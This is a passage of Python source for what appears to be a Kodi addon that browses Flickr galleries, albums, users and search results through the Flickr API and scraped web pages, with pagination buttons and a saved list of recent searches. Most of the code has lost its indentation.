fparams=fparams, summary=summ)
PLog(offset); PLog(pagemax);			# pagemax here is the number of galleries
tag = 'total: %s ' % pagemax + L('Galerien')
name = title_org
if (int(offset)+100) < int(pagemax):
offset = min(int(offset) +100, pagemax)
PLog(offset)
title_org=py2_encode(title_org);
fparams="&fparams={'title': '%s', 'offset': '%s'}" % (quote(title_org), offset)
addDir(li=li, label=title_org, action="dirList", dirID="MyGalleries", fanart=R(ICON_MEHR_100),
thumb=R(ICON_MEHR_100), fparams=fparams, summary=L('Mehr (+ 100)'), tagline=tag)
# fewer
if int(offset) > 100:
offset = max(int(offset)-100-max_count, 0)
PLog(offset)
title_org=py2_encode(title_org);
fparams="&fparams={'title': '%s', 'offset': '%s'}" % (quote(title_org), offset)
addDir(li=li, label=title_org, action="dirList", dirID="MyGalleries", fanart=R(ICON_WENIGER_100),
thumb=R(ICON_WENIGER_100), fparams=fparams, summary=L('Weniger (- 100)'), tagline=tag)
xbmcplugin.endOfDirectory(HANDLE, cacheToDisc=True)
#------------------------------------------------------------------------------------------
# Designation in the Flickr API: photosets
# Multiple pages - unlike MyGalleries
# Flickr output is in XML format.
# Workflow:
# MyAlbums -> MyAlbumsSingle -> BuildPath -> BuildPages -> SeparateVideos -> ShowPhotoObject
#
def MyAlbums(title, user_id, pagenr):
PLog('MyAlbums:'); PLog('page: ' + str(pagenr))
title_org = title # title_org: Username
path = BuildPath(method='flickr.photosets.getList', query_flickr='', user_id=user_id, pagenr=pagenr)
page, msg = RequestUrl(CallerName='MyAlbums', url=path)
if page == '':
msg1 = msg
MyDialog(msg1, '', '')
return
PLog(page[:100])
pages = stringextract('pages="', '"', page)			# in the header, number of pages
alben_max = stringextract('total="', '"', page)		# in the header
perpage = stringextract('perpage="', '"', page)		# in the header
thispagenr = stringextract('page="', '"', page)		# in the header, should match pagenr
PLog('Alben: %s, Seite: %s von %s, perpage: %s' % (alben_max, thispagenr, pages, perpage))
name = '%s %s/%s' % (L('Seite'), pagenr, pages)
li = xbmcgui.ListItem()
li = home(li, user_id=user_id) # Home-Button
if alben_max == '0':
msg1 = L('Keine Alben gefunden')
MyDialog(msg1, '', '')
return
records = blockextract('<photoset id', '', page)
PLog('records: ' + str(len(records)))
for rec in records:
title = stringextract('<title>', '</title>', rec)
photoset_id = stringextract('id="', '"', rec)
description = stringextract('description="', '"', rec)
count_photos = stringextract('photos="', '"', rec)
secret = stringextract('secret=\"', '\"', rec)
serverid = stringextract('server=\"', '\"', rec)
farmid = stringextract('farm=\"', '\"', rec)
title=unescape(title); title=repl_json_chars(title)
# URL format: https://www.flickr.com/services/api/misc.urls.html
# thumb_src = 'https://farm%s.staticflickr.com/%s/%s_%s_z.jpg' % (farmid, serverid, photoset_id, secret)	# m=small (240)
# The URL set is requested in BuildPath -> BuildExtras
thumb_src = stringextract('url_z="', '"', rec)		# z=640
summ = "%s %s (%s)" % (count_photos, L('Fotos'), title_org)	# count is not correct
if description:
summ = '%s | %s' % (summ, description)
img_src = R(ICON_FLICKR)
PLog('1Satz:')
PLog(title);PLog(photoset_id);PLog(thumb_src);
title=py2_encode(title);
fparams="&fparams={'title': '%s', 'photoset_id': '%s', 'user_id': '%s'}" % (quote(title), photoset_id,
user_id)
addDir(li=li, label=title, action="dirList", dirID="MyAlbumsSingle", fanart=thumb_src, thumb=thumb_src,
fparams=fparams, summary=summ)
# check for more:
PLog(pagenr); PLog(pages);
page_next = int(pagenr) + 1
tag = 'total: %s %s, %s %s ' % (alben_max, L('Alben'), pages, L('Seiten'))
title_org=py2_encode(title_org);
if page_next <= int(pages):
fparams="&fparams={'title': '%s', 'user_id': '%s', 'pagenr': '%s'}" % (quote(title_org), user_id, int(page_next))
addDir(li=li, label=title_org, action="dirList", dirID="MyAlbums", fanart=R(ICON_MEHR_1), thumb=R(ICON_MEHR_1),
fparams=fparams, summary=L('Mehr (+ 1)'), tagline=tag)
if (page_next+10) < int(pages):
fparams="&fparams={'title': '%s', 'user_id': '%s', 'pagenr': '%s'}" % (quote(title_org), user_id, int(page_next))
addDir(li=li, label=title_org, action="dirList", dirID="MyAlbums", fanart=R(ICON_MEHR_10), thumb=R(ICON_MEHR_10),
fparams=fparams, summary=L('Mehr (+ 10)'), tagline=tag)
if (page_next+100) < int(pages):
fparams="&fparams={'title': '%s', 'user_id': '%s', 'pagenr': '%s'}" % (quote(title_org), user_id, int(page_next))
addDir(li=li, label=title_org, action="dirList", dirID="MyAlbums", fanart=R(ICON_MEHR_100), thumb=R(ICON_MEHR_100),
fparams=fparams, summary=L('Mehr (+ 100)'), tagline=tag)
# fewer
page_next = int(pagenr) - 1
if page_next >= 1:
page_next = page_next - 1
fparams="&fparams={'title': '%s', 'user_id': '%s', 'pagenr': '%s'}" % (quote(title_org), user_id, int(page_next))
addDir(li=li, label=title_org, action="dirList", dirID="MyAlbums", fanart=R(ICON_WENIGER_1), thumb=R(ICON_WENIGER_1),
fparams=fparams, summary=L('Weniger (- 1)'), tagline=tag)
if page_next > 10:
page_next = page_next - 10
fparams="&fparams={'title': '%s', 'user_id': '%s', 'pagenr': '%s'}" % (quote(title_org), user_id, int(page_next))
addDir(li=li, label=title_org, action="dirList", dirID="MyAlbums", fanart=R(ICON_WENIGER_10), thumb=R(ICON_WENIGER_10),
fparams=fparams, summary=L('Weniger (- 10)'), tagline=tag)
if page_next > 100:
page_next = page_next - 100
fparams="&fparams={'title': '%s', 'user_id': '%s', 'pagenr': '%s'}" % (quote(title_org), user_id, int(page_next))
addDir(li=li, label=title_org, action="dirList", dirID="MyAlbums", fanart=R(ICON_WENIGER_100), thumb=R(ICON_WENIGER_100),
fparams=fparams, summary=L('Weniger (- 100)'), tagline=tag)
xbmcplugin.endOfDirectory(HANDLE, cacheToDisc=True)
#------------------------------------------------------------------------------------------
# Designation in the Flickr API: photosets
# Multiple pages - unlike MyGalleries
# Flickr output is in XML format.
# Page control via BuildPages (-> SeparateVideos -> ShowPhotoObject, ShowVideos)
#
def MyAlbumsSingle(title, photoset_id, user_id, pagenr=1):
PLog('MyAlbumsSingle:')
mymethod = 'flickr.photosets.getPhotos'
path = BuildPath(method=mymethod, query_flickr=mymethod, user_id=user_id, pagenr=1,
photoset_id=photoset_id)
page, msg = RequestUrl(CallerName='MyAlbumsSingle', url=path)
if page == '':
msg1 = msg
MyDialog(msg1, '', '')
return
PLog(page[:100])
pagemax = stringextract('pages="', '"', page)
perpage = stringextract('perpage="', '"', page)
PLog(pagemax); PLog(perpage)			# Flickr's figure does not match?
records = blockextract('<photo id', '', page)		# ShowPhotoObject: only '<photo id' blocks allowed
maxPageContent = SETTINGS.getSetting('maxPageContent')
mypagemax = len(records) / int(maxPageContent)
PLog('2Satz:')
PLog('records: %s, maxPageContent: %s, mypagemax: %s' % (str(len(records)), maxPageContent, str(mypagemax)))
# mypagemax = int(round(mypagemax + 0.49))		# force rounding up - dropped
# PLog('mypagemax: %s' % str(mypagemax))
searchname = '#MyAlbumsSingle#'
li = BuildPages(title=title, searchname=searchname, SEARCHPATH=path, pagemax=pagemax, perpage=perpage,
pagenr=1)
xbmcplugin.endOfDirectory(HANDLE, cacheToDisc=True)
####################################################################################################
# --------------------------
# FlickrPeople: the website is searched with the search term for the "Flickr Nutzer" menu.
# On failure Flickr returns the logged-in user
# The precision of the web search cannot be influenced.
#
def FlickrPeople(pagenr=1):
PLog('FlickrPeople: ' + str(SETTINGS.getSetting('FlickrPeople')))
PLog('pagenr: ' + str(pagenr))
pagenr = int(pagenr)
if SETTINGS.getSetting('FlickrPeople'):
username = SETTINGS.getSetting('FlickrPeople').replace(' ', '%20')	# blanks -> URL-conformant
path = 'https://www.flickr.com/search/people/?username=%s&page=%s' % (username, pagenr)
else:
msg1 = L('Einstellungen: Suchbegriff für Flickr Nutzer fehlt')
MyDialog(msg1, '', '')
return
title2 = 'Flickr People ' + L('Seite') + ' ' + str(pagenr)
li = xbmcgui.ListItem()
li = home(li, user_id='') # Home-Button
page, msg = RequestUrl(CallerName='FlickrPeople', url=path)
if page == '':
msg1 = msg
MyDialog(msg1, '', '')
return
PLog(page[:100])
page = page.replace('\\', '')			# path handling in the json section
total = 0
# totalItems[2] contains the count. If page is too large (no further
# results), they contain 0.
try:
totalItems = re.findall(r'totalItems":(\d+)\}\]', page)	# e.g. "totalItems":7}]
PLog(totalItems)
total = int(totalItems[0])
except Exception as exception:
PLog(str(exception))
PLog("total: " + str(total))
records = blockextract('_flickrModelRegistry":"search-contact-models"', 'flickrModelRegistry', page)
PLog(len(records))
thumb=R('icon-my.png')
i = 0 # loop count
for rec in records:
# PLog(rec)
nsid = stringextract('id":"', '"', rec)
if '@N' not in nsid:
continue
username = stringextract('username":"', '"', rec)
username=unescape(username); username=unquote(username)
realname = stringextract('realname":"', '"', rec)
alias = stringextract('pathAlias":"', '"', rec)		# may be missing
alias = unescape(alias); alias = unquote(alias)
if alias == '':
alias = username
iconfarm = stringextract('iconfarm":"', '"', rec)
iconserver = stringextract('iconserver":"', '"', rec)
followersCount = stringextract('followersCount":', ',', rec)
if followersCount == '':
followersCount = '0'
photosCount = stringextract('photosCount":', ',', rec)
if photosCount == '':				# photosCount may be missing
photosCount = '0'
iconserver = stringextract('iconserver":"', '"', rec)
title = "%s | %s" % (username, realname)
PLog(title)
title=unescape(title); title=unquote(title)
summ = "%s: %s" % (L('Fotos'), photosCount)
summ = summ + " | %s: %s | Alias: %s" % (L('Followers'), followersCount, alias)
PLog('5Satz')
PLog("username: %s, nsid: %s" % (username, nsid)); PLog(title)
if realname:
label=realname
else:
label=username
label=unescape(label); label=unquote(label)
username=py2_encode(username);
fparams="&fparams={'username': '%s', 'user_id': '%s'}" % (quote(username), nsid)
addDir(li=li, label=label, action="dirList", dirID="MyMenu", fanart=thumb, thumb=thumb,
fparams=fparams, summary=summ)
i = i + 1
if i == 0:
msg = SETTINGS.getSetting('FlickrPeople') + ': ' + L('kein Treffer')
PLog(msg)
msg1=msg
MyDialog(msg1, '', '')
xbmcplugin.endOfDirectory(HANDLE, cacheToDisc=True)
# plus/minus 1 page:
PLog(pagenr * len(records)); PLog(total)
if (pagenr * len(records)) < total:
title = 'FlickrPeople ' + L('Seite') + ' ' + str(pagenr+1)
fparams="&fparams={'pagenr': '%s'}" % (pagenr+1)
addDir(li=li, label=title, action="dirList", dirID="FlickrPeople", fanart=R(ICON_MEHR_1),
thumb=R(ICON_MEHR_1), fparams=fparams, summary=L('Mehr (+ 1)'))
if pagenr > 1:
title = 'FlickrPeople ' + L('Seite') + ' ' + str(pagenr-1)
fparams="&fparams={'pagenr': '%s'}" % (pagenr-1)
addDir(li=li, label=title, action="dirList", dirID="FlickrPeople", fanart=R(ICON_WENIGER_1),
thumb=R(ICON_WENIGER_1), fparams=fparams, summary=L('Weniger (- 1)'))
xbmcplugin.endOfDirectory(HANDLE, cacheToDisc=True)
####################################################################################################
# No API call is available for the gallery list without user_id - the website is parsed instead (combined html/json)
# No sorting by Flickr possible - in contrast to MyGalleries (sort_groups)
# 08.09.2019 block marker changed ('gallery-hunk clearfix' -> 'class="tile-container">')
# Scroll mechanism - only part of the web content is available.
#
def WebGalleries(pagenr):
PLog('WebGalleries: pagenr=' + pagenr)
if int(pagenr) < 1:
pagenr = "1"
path = GALLERY_PATH + 'page%s/' % (pagenr)		# suffix '?rb=1' only required in Watchdog (302 Found)
page, msg = RequestUrl(CallerName='WebGalleries: page %s' % pagenr, url=path)
if page == '':
msg1 = msg
MyDialog(msg1, '', '')
return
PLog(page[:50])
# the parameters page + perPage contained in it presumably have no effect on the
# page calculation. The web page shows 3 preview images for each gallery,
# after 24 galleries another 24 galleries appear on scroll-down.
#
# Alternative without images: the section "class="view pagination-view" contains the
# links to the individual pages.
totalItems = stringextract('totalItems":', '}', page)	# number of galleries, json section
PageSize = stringextract('viewPageSize":', ',', page)
PLog(totalItems); PLog(PageSize);
try:
pages = float(totalItems) / float(PageSize)
pagemax = int(math.ceil(pages))			# max. page number, round up for the remainder
except Exception as exception:
PLog(str(exception))
pagemax = 1
msg1 = "WebGalleries: " + L('Ermittlung der Seitenzahl gescheitert')
msg2 = "Gezeigt wird nur die erste Seite"
MyDialog(msg1, '', '')
PLog('pagemax: ' + str(pagemax));
name = L('Seite') + ' ' + pagenr + L('von') + ' ' + str(pagemax)
li = xbmcgui.ListItem()
li = home(li, user_id='') # Home-Button
records = blockextract('class="tile-container">', '', page)	# or gallery-case gallery-case-user
if len(records) == 0:
msg1 = L("Keine Gallerien gefunden")
MyDialog(msg1, '', '')
return
PLog(len(records))
for rec in records:						# elements per page: 12
# PLog(rec)								# if needed
href = BASE + stringextract('href="', '"', rec)		# e.g. https://www.flickr.com/photos/flickr/galleries/..
try:
href_id = href.split('/')[-2]
except:
href_id = ''
img_src = img_via_id(href_id, page)
gallery_id = href_id
title = stringextract('gallery-title">', '</h4>', rec) # in href
title=py2_encode(title);
title=cleanhtml(title); title=mystrip(title);
title=unescape(title); title=repl_json_chars(title)
nr_shown = stringextract('stat item-count">', '</span>', rec)	# count, e.g.: 15 photos
nr_shown = mystrip(nr_shown)
views = stringextract('stat view-count">', '</span>', rec)		# views, e.g.: 3.3K views
views = views.strip()
comments = stringextract('stat comment-count">', '</span>', rec)	# comments, e.g.: 17 comments
comments = mystrip(comments)
summ = "%s | %s | %s" % (nr_shown, views, comments )
PLog('6Satz:')
PLog(href);PLog(img_src);PLog(title);PLog(summ);PLog(gallery_id);
title=py2_encode(title);
fparams="&fparams={'title': '%s', 'gallery_id': '%s', 'user_id': '%s'}" % (quote(title), gallery_id, '')
addDir(li=li, label=title, action="dirList", dirID="Gallery_single", fanart=img_src, thumb=img_src,
fparams=fparams, summary=summ)
# check for more:
PLog("pagenr: %s, pagemax: %s" % (pagenr, pagemax))
pagenr = int(pagenr)
if pagenr < pagemax:
page_next = pagenr + 1					# path offset + 1
path = GALLERY_PATH + 'page%s/' % str(page_next)
PLog(path);
title = "%s, %s %s %s %s" % (L('Galerien'), L('Seite'), str(page_next), L('von'), str(pagemax))
fparams="&fparams={'pagenr': '%s'}" % str(page_next)
addDir(li=li, label=title, action="dirList", dirID="WebGalleries", fanart=R(ICON_MEHR_1),
thumb=R(ICON_MEHR_1), fparams=fparams)
# fewer
if pagenr > 1:
page_next = pagenr - 1					# path offset - 1
title = "%s, %s %s %s %s" % (L('Galerien'), L('Seite'), str(page_next), L('von'), str(pagemax))
fparams="&fparams={'pagenr': '%s'}" % str(page_next)
addDir(li=li, label=title, action="dirList", dirID="WebGalleries", fanart=R(ICON_WENIGER_1),
thumb=R(ICON_WENIGER_1), fparams=fparams)
xbmcplugin.endOfDirectory(HANDLE, cacheToDisc=True)
#---------------------------------------
# img_via_id: determined in the json part (ARD-Neu) via href_id
def img_via_id(href_id, page):
PLog("img_via_id: " + href_id)
if href_id == '':
img_src = R(ICON_FOLDER)
return img_src							# fallback if href_id is missing
records = blockextract('"compoundId":', '', page)
for rec in records:
if href_id in rec:
img_src = stringextract('"displayUrl":"', '"', rec)
img_src = img_src.replace('\\', '')
img_src = img_src.replace('_s', '') # ..475efd8f73_s.jpg
if img_src.startswith('https') == False:
img_src = 'https:' + img_src
if len(img_src) > 10:
return img_src
else:
return R(ICON_FOLDER)
#------------------------------------------------------------------------------------------
# Creates photo objects for WebGalleries + MyGalleries (paths -> returned in XML format).
# The thumbnails from Flickr are not needed - Plex creates them itself from the originals
# max. number of photos in a gallery: 50 (https://www.flickr.com/help/forum/en-us/72157646468539299/)
# currently no more/fewer control needed
def Gallery_single(title, gallery_id, user_id):
PLog('Gallery_single: ' + gallery_id)
searchname = '#Gallery#'
# omit pagenr here - set anew in BuildPages
href = BuildPath(method='flickr.galleries.getPhotos', query_flickr='', user_id=user_id, pagenr='')
href = href + "&gallery_id=%s" % (gallery_id)
li = BuildPages(title=title, searchname=searchname, SEARCHPATH=href, pagemax='?', perpage=1,
pagenr='?')
return li
####################################################################################################
# API format: https://api.flickr.com/services/rest/?method=flickr.photos.search&api_key=
# 24df437b03dd7bf070ba220aa717027e&text=Suchbegriff&page=3&format=rest
# Return format XML
#
# The free text search is used (see API): matches are possible in title, description + tags
# Several search terms, separated by blanks, result in an AND combination.
#
# 23.09.2020 list of recent search terms - kept here regardless of
# the search result
#
def Search(query='', user_id='', pagenr=1, title=''):
PLog('Search: ' + query);
# we jump directly - flow:
# Search -> Search_Work -> BuildPages (-> SeparateVideos -> ShowPhotoObject, ShowVideos)
query_file = os.path.join("%s/search_terms") % ADDON_DATA
if query == '':							# list of recent search entries
query_recent = RLoad(query_file, abs_path=True)
if query_recent.strip():
head = L('Suche')
search_list = [head]
query_recent= query_recent.strip().splitlines()
query_recent=sorted(query_recent, key=str.lower)
search_list = search_list + query_recent
title = L('Suche') + ': ' + L('im oeffentlichen Inhalt')
ret = xbmcgui.Dialog().select(title, search_list, preselect=0)
PLog(ret)
if ret == -1:
PLog("Liste Sucheingabe abgebrochen")
return Main()
elif ret == 0:
query = ''
else:
query = search_list[ret]
if query == '':
query = get_keyboard_input()			# module util
if query == None or query.strip() == '':
return ""
query = query.strip(); query_org = query
# due to the missing return values we save regardless
# of the search result:
if query:								# avoid empty input
query_recent= RLoad(query_file, abs_path=True)		# save the search entry
query_recent= query_recent.strip().splitlines()
if len(query_recent) >= 24:				# delete the 1st (oldest) entry
del query_recent[0]
query_org=py2_encode(query_org)			# store unquoted
if query_org not in query_recent:
query_recent.append(query_org)
query_recent = "\n".join(query_recent)
query_recent = py2_encode(query_recent)
RSave(query_file, query_recent) # withcodec: code-error
Search_Work(query=py2_encode(query), user_id=user_id)
return
# --------------------------
# Search_Work: makes the Flickr search function available outside the normal search, e.g.
# Photostream + Faves. The normal search function starts in Search, all others here.
# Flow:
# Search_Work -> page control via BuildPages (-> SeparateVideos -> ShowPhotoObject, ShowVideos)
#
# query='#Suchbegriff#' possible (MyMenu: MyPhotostream, MyFaves) - handled in BuildPath
# 10.04.2020 changed to '&Suchbegriff&' because of coding problems
# query='None' possible (Photostream)
#
# URLs: many photo sets contain different sizes - the first approach, requesting with b=large,
# frequently failed. Therefore the request uses a suffix list (extras), see
# https://www.flickr.com/services/api/misc.urls.html, and the "largest" URL is taken.
# (A standalone, hypothetical sketch of the raw REST call follows Search_Work below.)
#
def Search_Work(query, user_id, SEARCHPATH=''):
PLog('Search_Work: ' + query);
query_flickr = quote(query)
if query == '&Faves&': # MyFaves
SEARCHPATH = BuildPath(method='flickr.favorites.getList', query_flickr=query_flickr, user_id=user_id, pagenr='')
else:
# BuildPath additionally supplies Dict['extras_list'] for the photo selection (see below)
SEARCHPATH = BuildPath(method='flickr.photos.search', query_flickr=query_flickr, user_id=user_id, pagenr='')
PLog(SEARCHPATH)
if query == 'None':						# from Photostream
searchname = L('Seite')
title='Photostream'
else:
searchname = L('Suche') + ': ' + query + ' ' + L('Seite')
title=query
if query.startswith('&') and query.endswith('&'):	# from MyPhotostream / MyFaves
title = query.replace('&', '')
searchname = L('Seite')					# completed in BuildPages
PLog(title)
BuildPages(title=title, searchname=searchname, SEARCHPATH=SEARCHPATH, pagemax=1, perpage=1, pagenr='?')
return
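# The function below is an illustrative, standalone sketch (it is not used by the addon):
# it shows the raw flickr.photos.search REST call that Search_Work delegates to
# BuildPath/RequestUrl, and how the page count is read from the XML header attributes.
# "YOUR_API_KEY" is a placeholder; in the addon the key comes from GetKey().
def example_flickr_search(text, api_key="YOUR_API_KEY", per_page=100):
    import re as _re
    from urllib.parse import quote_plus as _quote_plus		# Python 3 only in this sketch
    from urllib.request import urlopen as _urlopen
    url = ("https://api.flickr.com/services/rest/?method=flickr.photos.search"
           "&api_key=%s&text=%s&per_page=%s&page=1&format=rest"
           "&extras=url_o,url_k,url_h,url_b,url_c,url_z") % (api_key, _quote_plus(text), per_page)
    xml = _urlopen(url).read().decode('utf-8')
    pages = _re.search(r'pages="(\d+)"', xml)				# attributes of the <photos ...> header
    total = _re.search(r'total="(\d+)"', xml)
    return (int(pages.group(1)) if pages else 0,
            int(total.group(1)) if total else 0)
# Example (hypothetical): example_flickr_search('sunset') -> (number_of_pages, number_of_photos)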
#----------------------------------------------------------------
# Output control for photo pages: buttons for the individual pages, including more/fewer.
# If only 1 page exists, SeparateVideos is called directly.
# Moving the output out into ShowPhotoObject is required for PHT (it cannot handle control buttons)
# searchname controls how title2 of the ObjectContainer is set - enclosing it
# in ## marks: not a search
# Because of the PHT problem we do not apply perpage when outputting the photos of a single
# page - the Flickr default here is 100 (same for the search).
# If the page number (page) is exceeded, Flickr shows the last available page.
# Flickr's page calculation is only correct if "Originalbild" is selected as the maximum
# image size. For smaller sizes Flickr does not subtract the pages that fall away -
# then the addon shows the first page again, although according to Flickr further pages exist.
def BuildPages(title, searchname, SEARCHPATH, pagemax=1, perpage=1, pagenr=1, photototal=1):
PLog('BuildPages:')
PLog('SEARCHPATH: %s' % (SEARCHPATH))
PLog(pagenr); PLog(title)
title_org = title
if pagenr == '?' or pagenr == '':		# content still unknown
page, msg = RequestUrl(CallerName='BuildPages', url=SEARCHPATH)
if page == '':
msg1=msg
MyDialog(msg1, '', '')
return
PLog(page[:100])
if '<rsp stat="ok">' not in page or 'pages="0"' in page:
msg1 = L('kein Treffer')
MyDialog(msg1, '', '')
return
pagemax = stringextract('pages="', '"', page)
photototal = stringextract('total="', '"', page)	# currently not used
perpage = stringextract('perpage="', '"', page)		# Flickr default: 100 per page
pagenr = 1											# start with page 1
PLog('Flickr: pagemax %s, total %s, perpage %s' % (pagemax, photototal, perpage))
pagenr = int(pagenr); pagemax = int(pagemax);
maxPageContent = 500					# Flickr maximum
if SETTINGS.getSetting('maxPageContent'):		# objects per page (settings)
maxPageContent = int(SETTINGS.getSetting('maxPageContent'))
if pagenr < 1:
pagenr = 1
pagenr = min(pagenr, pagemax)
PLog("Plugin: pagenr %d, maxPageContent %d, pagemax %d" % (pagenr, maxPageContent, pagemax))
# determine user_id for home (PHT problem)
# paths without user_id are possible (e.g. search + Photostream from Main)
try:
user_id = re.search(u'user_id=(\d+)@N0(\d+)', SEARCHPATH).group(0) #user_id=66956608@N06
user_id = user_id.split('=')[1]
except Exception as exception:
PLog(str(exception))
user_id = ''
# not a search - e.g. '#Gallery#'
if searchname.startswith('#') and searchname.endswith('#'):
searchname = searchname.replace('#', '')
title_org = searchname					# title for ShowPhotoObject
searchname = L('Seite')
name = '%s %s/%s' % (searchname, pagenr, pagemax)
pagemax = int(pagemax)
if pagemax == 1:						# only 1 page -> SeparateVideos directly
title = title + ' %s' % 1				# e.g. "scott wilson Seite 1"
PLog('pagemax=1, jump to SeparateVideos')
li = SeparateVideos(title=title, path=SEARCHPATH, title_org=title_org)
return li
li = xbmcgui.ListItem()
li = home(li, user_id=user_id) # Home-Button
for i in range(pagemax):
title = L('Seite') + ': ' + str(pagenr)
# adapt SEARCHPATH to pagenr
path1 = SEARCHPATH.split('&page=')[0]	# split before + after page
path2 = SEARCHPATH.split('&page=')[1]
pos = path2.find('&')					# cut off the current pagenr
path2 = path2[pos:]
path = path1 + '&page=%s' % str(pagenr) + path2		# rejoin part 1 + part 2
path = path + '&per_page=%s' % str(maxPageContent)
PLog('3Satz:')
PLog("i %d, pagenr %d" % (i, pagenr))
PLog(path); # PLog(path1); PLog(path2);
# SeparateVideos -> ShowPhotoObject, ShowVideos:
title=py2_encode(title); path=py2_encode(path);
title_org=py2_encode(title_org);
fparams="&fparams={'title': '%s', 'path': '%s', 'title_org': '%s'}" % (quote(title),
quote(path), quote(title_org))
addDir(li=li, label=title, action="dirList", dirID="SeparateVideos", fanart=R('icon-next.png'),
thumb=R('icon-next.png'), fparams=fparams)
pagenr = pagenr + 1
if i >= maxPageContent-1:				# limit of objects per page
break
if pagenr >= pagemax+1:					# limit of total plugin pages
break
# check for more:
# max/min limits see above
PLog('Mehr:')
PLog(pagenr); PLog(pagemax); PLog(maxPageContent);
tag = 'total: %s ' % pagemax + L('Seiten')
title_org=py2_encode(title_org); searchname=py2_encode(searchname); SEARCHPATH=py2_encode(SEARCHPATH)
if pagenr <= pagemax:
pagenr_next = pagenr
title = L('Mehr (+ 1)')
fparams="&fparams={'title': '%s', 'searchname': '%s', 'SEARCHPATH': '%s', 'pagemax': '%s', 'pagenr': '%s'}" %\
(quote(title_org), quote(searchname), quote(SEARCHPATH), pagemax, pagenr_next)
addDir(li=li, label=title_org, action="dirList", dirID="BuildPages", fanart=R(ICON_MEHR_1), thumb=R(ICON_MEHR_1),
fparams=fparams)
if pagenr + (9 * maxPageContent) <= pagemax:
pagenr_next = pagenr + (10 * maxPageContent)
title = L('Mehr (+ 10)')
fparams="&fparams={'title': '%s', 'searchname': '%s', 'SEARCHPATH': '%s', 'pagemax': '%s', 'pagenr': '%s'}" %\
(quote(title_org), quote(searchname), quote(SEARCHPATH), pagemax, pagenr_next)
addDir(li=li, label=title_org, action="dirList", dirID="BuildPages", fanart=R(ICON_MEHR_10), thumb=R(ICON_MEHR_10),
fparams=fparams)
if pagenr + (99 * maxPageContent) <= pagemax:
pagenr_next = pagenr + (100 * maxPageContent)
title = L('Mehr (+ 100)')
fparams="&fparams={'title': '%s', 'searchname': '%s', 'SEARCHPATH': '%s', 'pagemax': '%s', 'pagenr': '%s'}" %\
(quote(title_org), quote(searchname), quote(SEARCHPATH), pagemax, pagenr_next)
addDir(li=li, label=title_org, action="dirList", dirID="BuildPages", fanart=R(ICON_MEHR_100), thumb=R(ICON_MEHR_100),
fparams=fparams)
if pagenr + (499 * maxPageContent) <= pagemax:
pagenr_next = pagenr + (500 * maxPageContent)
title = L('Mehr (+ 500)')
fparams="&fparams={'title': '%s', 'searchname': '%s', 'SEARCHPATH': '%s', 'pagemax': '%s', 'pagenr': '%s'}" %\
(quote(title_org), quote(searchname), quote(SEARCHPATH), pagemax, pagenr_next)
addDir(li=li, label=title_org, action="dirList", dirID="BuildPages", fanart=R(ICON_MEHR_500), thumb=R(ICON_MEHR_500),
fparams=fparams)
# fewer
if pagenr-1 > maxPageContent:			# maxPageContent = 1 page
pagenr_next = pagenr - ( 2* maxPageContent)
title = L('Weniger (- 1)')
fparams="&fparams={'title': '%s', 'searchname': '%s', 'SEARCHPATH': '%s', 'pagemax': '%s', 'pagenr': '%s'}" %\
(quote(title_org), quote(searchname), quote(SEARCHPATH), pagemax, pagenr_next)
addDir(li=li, label=title_org, action="dirList", dirID="BuildPages", fanart=R(ICON_WENIGER_1), thumb=R(ICON_WENIGER_1),
fparams=fparams)
if pagenr-1 > (10 * maxPageContent):
pagenr_next = pagenr - (10 * maxPageContent)
title = L('Weniger (- 10)')
fparams="&fparams={'title': '%s', 'searchname': '%s', 'SEARCHPATH': '%s', 'pagemax': '%s', 'pagenr': '%s'}" %\
(quote(title_org), quote(searchname), quote(SEARCHPATH), pagemax, pagenr_next)
addDir(li=li, label=title_org, action="dirList", dirID="BuildPages", fanart=R(ICON_WENIGER_10), thumb=R(ICON_WENIGER_10),
fparams=fparams)
if pagenr-1 > 100:
pagenr_next = pagenr - (100 * maxPageContent)
title = L('Weniger (- 100)')
fparams="&fparams={'title': '%s', 'searchname': '%s', 'SEARCHPATH': '%s', 'pagemax': '%s', 'pagenr': '%s'}" %\
(quote(title_org), quote(searchname), quote(SEARCHPATH), pagemax, pagenr_next)
addDir(li=li, label=title_org, action="dirList", dirID="BuildPages", fanart=R(ICON_WENIGER_100), thumb=R(ICON_WENIGER_100),
fparams=fparams)
if pagenr-1 > 500:
pagenr_next = pagenr - (500 * maxPageContent)
title = L('Weniger (- 500)')
fparams="&fparams={'title': '%s', 'searchname': '%s', 'SEARCHPATH': '%s', 'pagemax': '%s', 'pagenr': '%s'}" %\
(quote(title_org), quote(searchname), quote(SEARCHPATH), pagemax, pagenr_next)
addDir(li=li, label=title_org, action="dirList", dirID="BuildPages", fanart=R(ICON_WENIGER_500), thumb=R(ICON_WENIGER_500),
fparams=fparams)
xbmcplugin.endOfDirectory(HANDLE, cacheToDisc=True)
#----------------------------------------------------------------
# SeparateVideos: called by BuildPages if SETTINGS.getSetting('showVideos') is selected
# - 2 buttons if the page (path) contains both videos and photos.
# otherwise it branches directly to ShowPhotoObject or ShowVideos
# (the page is reloaded from the cache)
# - user_id,username,realname are determined here + passed on
def SeparateVideos(title, path, title_org):
PLog('SeparateVideos: ' + path)
li = xbmcgui.ListItem()
page, msg = RequestUrl(CallerName='SeparateVideos', url=path)
if page == '':
msg1 = msg
MyDialog(msg1, '', '')
PLog(page[:100])						# result in XML format, processed here as strings
# reverse lookup: user_id -> username + realname
# 1. determine user_id from path, 2. call flickr.people.getInfo
# only if user_id is known - not for the public items (it would have to be determined
# via nsid for every record - too time-consuming for 100 records)
# paths without user_id are possible (e.g. search + Photostream from Main)
try:
user_id = re.search(u'user_id=(\d+)@N0(\d+)', path).group(0) #user_id=66956608@N06
user_id = user_id.split('=')[1]
except Exception as exception:
PLog(str(exception))
user_id = ''
username=''; realname='';
if user_id and ('None' not in user_id):	# 'None' = PHT dummy
user_id,nsid,username,realname = GetUserID(user_id)		# load the user profile
PLog('user_id %s, username %s, realname %s' % (user_id,username,realname))
if SETTINGS.getSetting('showVideos') == 'false':	# do not show videos
ShowPhotoObject(title,path,user_id,username,realname,title_org)	# directly
return
if 'media="video"' in page and 'media="photo"' in page: # Auswahlbuttons für Fotos + Videos zeigen
# title von BuildPages
title=py2_encode(title); path=py2_encode(path); username=py2_encode(username);
realname=py2_encode(realname); title_org=py2_encode(title_org);
fparams="&fparams={'title': '%s', 'path': '%s', 'user_id': '%s', 'username': '%s', 'realname': '%s', 'title_org': '%s'}" %\
(quote(title), quote(path), user_id, quote(username), quote(realname), quote(title_org))
addDir(li=li, label=title, action="dirList", dirID="ShowPhotoObject", fanart=R('icon-photo.png'),
thumb=R('icon-photo.png'), fparams=fparams)
